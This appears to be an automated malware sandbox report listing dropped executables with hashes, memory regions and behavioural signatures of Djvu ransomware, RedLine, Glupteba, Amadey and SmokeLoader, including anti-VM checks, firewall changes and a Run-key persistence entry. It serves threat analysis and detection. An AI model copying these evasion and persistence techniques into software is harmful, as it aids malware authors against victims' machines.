SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8B02.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

memory/2628-35-0x00000000001C0000-0x00000000008FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6AD.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/2628-38-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-39-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-40-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-41-0x00000000755F0000-0x0000000075637000-memory.dmp

memory/2628-42-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-44-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-45-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2680-43-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2628-47-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-49-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-51-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-52-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-50-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-53-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-54-0x0000000076750000-0x0000000076860000-memory.dmp

\Users\Admin\AppData\Local\Temp\A6AD.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/2628-57-0x0000000076750000-0x0000000076860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B510.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\B510.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

memory/2628-63-0x00000000755F0000-0x0000000075637000-memory.dmp

memory/2628-65-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-67-0x00000000770C0000-0x00000000770C2000-memory.dmp

memory/2680-68-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3056-64-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/3056-69-0x0000000000180000-0x0000000000186000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BD89.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

C:\Users\Admin\AppData\Local\Temp\BD89.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/1248-78-0x0000000002BD0000-0x0000000002BE6000-memory.dmp

memory/1972-79-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/1972-81-0x0000000000895000-0x00000000008A8000-memory.dmp

memory/1972-83-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D06E.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\D06E.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3056-88-0x0000000002200000-0x0000000002326000-memory.dmp

memory/3056-89-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-90-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-92-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-93-0x0000000002330000-0x0000000002439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2628-101-0x00000000001C0000-0x00000000008FE000-memory.dmp

memory/1272-115-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-114-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1272-112-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-110-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-109-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-108-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-123-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-131-0x0000000000400000-0x000000000043E000-memory.dmp

memory/2628-135-0x0000000073AA0000-0x000000007418E000-memory.dmp

memory/2680-136-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\2259af8a-cce1-4d72-80ee-fa37b1e9acb5\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1272-144-0x0000000073AA0000-0x000000007418E000-memory.dmp

memory/3012-145-0x0000000000060000-0x000000000006C000-memory.dmp

memory/3012-146-0x0000000000060000-0x000000000006C000-memory.dmp

memory/2628-149-0x00000000001C0000-0x00000000008FE000-memory.dmp

\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/1440-155-0x00000000000C0000-0x000000000012B000-memory.dmp

memory/1440-156-0x00000000001A0000-0x0000000000215000-memory.dmp

memory/2628-157-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-159-0x00000000755F0000-0x0000000075637000-memory.dmp

memory/2628-158-0x0000000076750000-0x0000000076860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/1440-173-0x00000000000C0000-0x000000000012B000-memory.dmp

memory/2628-174-0x0000000076750000-0x0000000076860000-memory.dmp

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2628-178-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2680-179-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2628-182-0x0000000076750000-0x0000000076860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2628-175-0x0000000076750000-0x0000000076860000-memory.dmp

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2628-183-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-184-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-185-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-186-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-187-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-191-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-192-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/2628-193-0x0000000076750000-0x0000000076860000-memory.dmp

memory/1272-194-0x0000000000580000-0x00000000005C0000-memory.dmp

memory/2880-195-0x0000000002030000-0x00000000020C1000-memory.dmp

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2880-202-0x0000000002030000-0x00000000020C1000-memory.dmp

memory/2628-203-0x0000000073AA0000-0x000000007418E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1272-204-0x0000000073AA0000-0x000000007418E000-memory.dmp

memory/2848-205-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2848-206-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 f4b14b414bb7d64a8aba0492c4920ebd
SHA1 7a8463089433ccb9c66a5d49baa69c0009efa069
SHA256 692ad14c0599ce59668b08554ec0fb5dbc70fc286bb0f14ca420328d3949760a
SHA512 0328bdbe490487cdbf5438927e4a2840288c3b664975a795df8f9384f7e8030665c6e3526223a3176dfc02cfbc2a40feb35b74e8d63f8c0282c5d2349dfb38bc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 4402a0fc0ec273e2c3bd6a1188700b05
SHA1 2c8ff24692967b5ae6a2b827113336b51bfe59d6
SHA256 18b75f28d4760e6da2dd7a54f388dfa8576e124acee9fa1127b0ad7be52c51b9
SHA512 fc105e88cc8c5a785914a2eb6920e4b648db2332e1984e3f61f396562229e89f6a6200859868419664cc5436750a0014934102e618088ccf7c270c13d60b9abf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e768736b9382ad18e2130c34f422cf7
SHA1 08bb4f20f55c6f8d5cfab5280dd045f67232a8cf
SHA256 eb57e7b948d15d86feda8ee801c8e419955c1d23190526119e79516b9b64ba9b
SHA512 007ed2cf0d880db1b4d1a810724e52522170734800f152ba51ff41fdfaec04e31eb0e5c1f9e321b358a48976e483207062fdd267803e4d946ff34557ce33cf48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 7450e733e6aa21082c642a106b9702b9
SHA1 59078c63829f6df95658ef28e1efccdd21a9f445
SHA256 1d75d290f6b52f5766736deb1bec22d8ddbe2fbd7317b6e36665f0f341bdb85f
SHA512 6ba5460b6450a377896d153df5e05601e845ecbd439716df2d521b403d5f79576d728c9decdc445575ab95eb236ad612096ac549cf2c886d6e2f14edca21697d

C:\Users\Admin\AppData\Local\Temp\Cab55BE.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/2848-222-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2848-221-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar5B03.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2271ffb6bc53740d45fd20a6d74b0941
SHA1 d5d41d15296fe075f36b8eaf821823e642e5f1d6
SHA256 1ead14c33c1021270d59a59e342890ba07b5d36782238174c859dca23879791d
SHA512 83a7ec9167432fe668c6b581b68af6c035a8b6ea366d0df8fc501431541838011dc152a2e66a6d795f5035d70c26a9f2ec8161cc24627df09fd047506987ea37

memory/2848-287-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2848-289-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2848-290-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

memory/2168-304-0x00000000000C0000-0x00000000000CB000-memory.dmp

memory/2628-305-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/2168-306-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2168-307-0x00000000000C0000-0x00000000000CB000-memory.dmp

memory/1272-308-0x0000000000580000-0x00000000005C0000-memory.dmp

memory/1456-311-0x0000000000860000-0x00000000008B1000-memory.dmp

memory/1456-310-0x00000000002D0000-0x00000000003D0000-memory.dmp

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

memory/2848-314-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1484-315-0x00000000000E0000-0x00000000000EF000-memory.dmp

memory/2848-316-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1484-317-0x0000000000860000-0x00000000008B1000-memory.dmp

memory/2544-319-0x0000000000080000-0x0000000000089000-memory.dmp

memory/748-326-0x00000000000E0000-0x00000000000EC000-memory.dmp

memory/2408-329-0x0000000000080000-0x00000000000A7000-memory.dmp

memory/744-334-0x0000000000080000-0x0000000000089000-memory.dmp

memory/2848-344-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/2924-346-0x0000000000080000-0x000000000008B000-memory.dmp

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-18 18:07

Reported

2023-10-18 18:13

Platform

win10v2004-20230915-en

Max time kernel

111s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\759D.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5F80.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2\\5F80.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5F80.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
